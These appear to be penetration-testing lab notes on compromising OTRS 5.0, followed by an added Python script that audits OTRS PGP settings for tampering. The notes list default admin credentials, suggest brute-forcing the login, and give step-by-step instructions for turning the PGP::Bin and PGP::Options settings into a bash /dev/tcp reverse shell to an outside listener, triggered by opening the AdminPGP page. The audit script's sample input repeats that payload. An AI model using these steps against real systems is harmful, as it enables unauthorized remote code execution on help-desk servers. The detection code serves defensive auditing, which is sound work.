OTRS 5.0

Admin console default location: http://10.11.1.38/otrs/index.pl
Default user: root@localhost
Password: otrs

Password can be brute-forced using Burp

#Exploit
https://www.exploit-db.com/exploits/49794
sudo searchsploit -m 43853.txt

Instructions:
OTRS 5.0.2 PoC:
[1] Log in to the dashboard, navigate to Admin → Sysconfig
[2] Just copy and paste the URL provided in the ExploitDB PoC
    Action=AdminSysConfig;Subaction=Edit;SysConfigSubGroup=Crypt%3A%3APGP;SysConfigGroup=Framework
[3] Edit the following
    PGP=yes
    PGP::Bin = /bin/bash
    PGP::Options = -c 'exec bash -i &>/dev/tcp/192.168.119.177/443 <&1'
    PGP::Trusted Network = Yes
[4] Set up a listener on port 443
    nc -nvlp 443
[5] Trigger revshell
    10.11.1.38/otrs/index.pl?Action=AdminPGP

Shell
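The steps above work because whatever is stored in PGP::Bin and PGP::Options is what gets launched when the PGP admin page is opened, so those two settings are worth auditing on any OTRS host. The following is an added example, not part of the original notes or the ExploitDB PoC: it flags a PGP::Bin that is not a GnuPG binary and PGP::Options that contain shell syntax. The Perl-style assignment format, the allow-list and both sample inputs are constructed assumptions.

```python
import re
from pathlib import PurePosixPath

# Assumption: settings are supplied as Perl-style assignment lines
# ($Self->{'Key'} = 'value';). This input format is constructed for the example.
SETTING_RE = re.compile(r"""\$Self->\{'(PGP(?:::\w+)?)'\}\s*=\s*'((?:[^'\\]|\\.)*)'""")

ALLOWED_BINARIES = {"gpg", "gpg2"}  # assumption: site allow-list of GnuPG binaries
SHELL_MARKERS = ("/dev/tcp", "/dev/udp", "exec ", "&>", "<&", "|", ";", "`", "$(")

# Constructed sample: settings as they would look after the edit in step [3]
# (192.0.2.10 is a documentation address, not a value from the page).
SAMPLE_TAMPERED = r"""
$Self->{'PGP'} =  '1';
$Self->{'PGP::Bin'} =  '/bin/bash';
$Self->{'PGP::Options'} =  '-c \'exec bash -i &>/dev/tcp/192.0.2.10/443 <&1\'';
"""

# Constructed sample: a plausible benign configuration.
SAMPLE_CLEAN = r"""
$Self->{'PGP'} =  '1';
$Self->{'PGP::Bin'} =  '/usr/bin/gpg';
$Self->{'PGP::Options'} =  '--homedir /opt/otrs/.gnupg/ --batch --no-tty --yes';
"""

def parse_settings(text):
    """Return {key: value} for every PGP* assignment, unescaping \\' in values."""
    return {k: v.replace("\\'", "'") for k, v in SETTING_RE.findall(text)}

def audit_pgp_settings(settings):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    binary = settings.get("PGP::Bin", "")
    if binary and PurePosixPath(binary).name not in ALLOWED_BINARIES:
        findings.append(f"PGP::Bin is not a GnuPG binary: {binary}")
    options = settings.get("PGP::Options", "")
    hits = [m for m in SHELL_MARKERS if m in options]
    if hits:
        findings.append("PGP::Options contains shell syntax: " + " ".join(hits))
    return findings

if __name__ == "__main__":
    for name, sample in (("tampered", SAMPLE_TAMPERED), ("clean", SAMPLE_CLEAN)):
        print(name, audit_pgp_settings(parse_settings(sample)))
```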
